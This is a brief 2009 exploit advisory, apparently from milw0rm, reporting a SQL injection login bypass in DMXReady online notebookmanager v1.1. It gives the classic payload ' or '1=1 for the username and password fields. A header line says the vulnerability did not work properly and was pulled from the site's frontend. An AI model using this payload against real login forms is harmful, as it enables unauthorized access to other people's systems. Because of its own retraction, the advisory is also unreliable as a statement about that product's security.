# 02/04/2009 - vulnerability didn't work properly, removed from frontend. /str0ke =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- = = XORON 2009(C) = = DMXReady online notebookmanager v1.1 Bypass SQL Injection Vuln. = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- = = Script: DMXReady online notebookmanager, version 1.1 = Price: $289 = = Author: xoron = = Tesekkurler unutmayan VolqaN! = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- = = BUGS = = Sql Injections: = Bypass-> username/password: ' or '1=1 = = = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # milw0rm.com [2009-02-03]